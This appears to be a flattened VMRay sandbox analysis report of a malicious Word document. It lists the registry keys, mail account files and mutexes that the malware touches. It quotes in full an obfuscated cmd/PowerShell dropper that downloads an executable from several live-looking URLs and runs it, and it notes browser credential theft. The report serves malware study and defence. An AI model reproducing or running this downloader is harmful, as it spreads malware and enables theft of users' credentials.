users\aetadzjz\appdata\local\microsoft\windows\history\low\history.ie5\mshist012017071220170713\index.dat c:\ c:\users\aetadzjz\appdata\local\microsoft\windows\history\low\history.ie5\mshist012017071220170713\index.dat dat File 
programdata\fb70.tmp programdata\fb70.tmp c:\ c:\programdata\fb70.tmp tmp WinRegistryKey Mozilla Firefox\bin INVALID WinRegistryKey Mozilla Firefox 25.0\bin INVALID PathToExe WinRegistryKey Mozilla Firefox 25.0\bin INVALID PathToExe WinRegistryKey Mozilla Firefox 25.0\bin INVALID PathToExe File users\aetadzjz\appdata\local\microsoft\windows mail\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount users\aetadzjz\appdata\local\microsoft\windows mail\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount c:\ c:\users\aetadzjz\appdata\local\microsoft\windows mail\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount oeaccount File users\aetadzjz\appdata\local\microsoft\windows mail\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount users\aetadzjz\appdata\local\microsoft\windows mail\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount c:\ c:\users\aetadzjz\appdata\local\microsoft\windows mail\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount oeaccount File users\aetadzjz\appdata\local\microsoft\windows mail\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount users\aetadzjz\appdata\local\microsoft\windows mail\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount c:\ c:\users\aetadzjz\appdata\local\microsoft\windows mail\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount oeaccount File programdata\fb2f.tmp programdata\fb2f.tmp c:\ c:\programdata\fb2f.tmp tmp WinRegistryKey Software\Qualcomm\Eudora\CommandLine HKEY_CURRENT_USER WinRegistryKey Software\Classes\Software\Qualcomm\Eudora\CommandLine\current HKEY_LOCAL_MACHINE WinRegistryKey Software\Mozilla\Mozilla Thunderbird HKEY_LOCAL_MACHINE WinRegistryKey Software\Google\Google Talk\Accounts HKEY_CURRENT_USER WinRegistryKey Software\Google\Google Desktop\Mailboxes HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Account Manager\Accounts HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts HKEY_CURRENT_USER WinRegistryKey Identities 
HKEY_CURRENT_USER WinRegistryKey Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38} HKEY_CURRENT_USER Username WinRegistryKey Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Internet Account Manager\Accounts HKEY_CURRENT_USER WinRegistryKey Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\15.0\Outlook\Profiles HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\189cba75c69c634996739bac92103ebb HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1a8bd43e654f65418fbafadeef063a57 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1cfb96c6c96b454ebff73da2e9f63f51 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\467888fc50a6c6448d6cc0cf7b5307d6 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\48dea081c9634a43a6861907855add5c HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\55aad8d134512d438564aa678cb92d66 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\71b0295bef58e344911262b243f005ac HKEY_CURRENT_USER WinRegistryKey 
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER POP3 User IMAP User HTTP User SMTP User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER POP3 User POP3 Server Display Name Email SMTP Server SMTP Port POP3 Port POP3 Use SPA POP3 Password IMAP User HTTP User SMTP User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER POP3 User IMAP User HTTP User SMTP User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 HKEY_CURRENT_USER WinRegistryKey Software\IncrediMail\Identities HKEY_CURRENT_USER WinRegistryKey Software\IncrediMail\Identities HKEY_LOCAL_MACHINE WinRegistryKey Software\Group Mail HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\MSNMessenger HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\MessengerService HKEY_CURRENT_USER WinRegistryKey Software\Yahoo\Pager HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\IdentityCRL HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Windows Live Mail HKEY_CURRENT_USER File users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe c:\ c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe exe Mutex Global\I705BA84C Mutex Global\M705BA84C Analyzed Sample #20386 Malware Artifacts 20386 Sample-ID: #20386 Job-ID: #14428 This sample was analyzed by VMRay Analyzer 2.2.0 on a Windows 7 system 0 VTI Score based 
on VTI Database Version 2.6 Metadata of Sample File #20386 Submission-ID: #21233 C:\Users\aETAdzjz\Desktop\ihknzkjo.doc doc MD5 74008c237f9382ac5a6472d097687a8b SHA1 678dc05873c09fd280da2030aa630b0b42d986ad SHA256 607aa428401fe8e6d66583cdfc43a7879b1173c0d116a1e53ebd4e044511bfd1 Opened_By Metadata of Analysis for Job-ID #14428 Timeout False x86 64-bit 6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa) win7_64_sp1-mso2016 True 144.826 Windows 7 This is a property collection for additional information of VMRay analysis VMRay Analyzer Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "CmD wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %binkOHOTJcSMBkQ%=EINhmPkdO&&set %kiqjRiiiH%=owe^r^s&&set %zzwpVwCTCRDvTBu%=pOwoJiQoW&&set %CdjPuLtXi%=p&&set %GKZajcAqFZkRLZw%=NazJjhVlGSrXQvT&&set %QiiPPcnDM%=^he^l^l&&set %jiIZiKXbkZQMpuQ%=dipAbiiHEplZSHr&&!%CdjPuLtXi%!!%kiqjRiiiH%!!%QiiPPcnDM%! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH'+'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn'+'Lpun.co.uxp+uxpuk/npZVn'+'L+Vn'+'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r'+'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp'+'p-content/themes-suVnL+VnLspeVnL+V'+'nLcted/umuxp+uxpo'+'juxp+uxpp43uxp+uxp/uNssVnL+Vn'+'Luxp+uxpuwuxp+uxpHS/,http://www.wang'+'lb.topux'+'p+uxp/wp-conteuxp+'+'uxpnt/Td/,h'+'ttuxp+uxppuxp+uxp:uxp'+'+uxp//uxp+uxpwux'+'p+uxpww.uxp+uxpfr'+'iuxp+uxVnL+Vn'+'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk'+'VnL+VnLauxp+uxprapas =uxp+uxp 
u'+'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 343245);eAuxp+uxpbhuxp+uxpua'+'s = uxp+uxpeAuxp'+'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu'+'xp+'+'uxpj +uVn'+'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr'+'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+'+'VnLnc.Downlo'+'adFile(e'+'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV'+'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp'+';break'+'VnL+VnL;}catch{write-host uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V'+'nLp+uxpVnL+VnL.Messuxp+uxpag'+'e;}}VnL+VnLuxp)-REplaCE uxpGW9'+'uxp,[cHa'+'r]92-CREpLaCE ([c'+'Har]8'+'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6'+'5+[cHar]VnL+Vn'+'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce'+' VnLz3LVnL,[cHAR]124-rePlAce VnLuxpVnL,[cHAR]39 -cREpLaCe([c'+'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) ').repLacE('ctV','$').repLacE('VnL',[String][char]39) ) ". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe". Create process Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Global\.net clr networking". Create system object Network VTI rule match with VTI rule score 3/5 vmray_request_dns_by_name Resolve host name "www.indpts.com". Perform DNS request Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Users\Public\3292.exe". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp"". 
Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp"". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp"". Create process Browser VTI rule match with VTI rule score 3/5 vmray_read_browser_history Read the browsing history for "Microsoft Internet Explorer". Read data related to browsing history Information Stealing VTI rule match with VTI rule score 4/5 vmray_readout_browser_credentials Possibly trying to read out browser credentials. Read browser data Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Global\I705BA84C". Create system object Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Global\M705BA84C". Create system object